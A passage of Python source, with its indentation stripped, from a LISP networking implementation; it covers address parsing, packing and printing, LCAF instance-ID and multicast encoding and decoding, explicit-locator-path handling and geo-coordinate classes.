self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
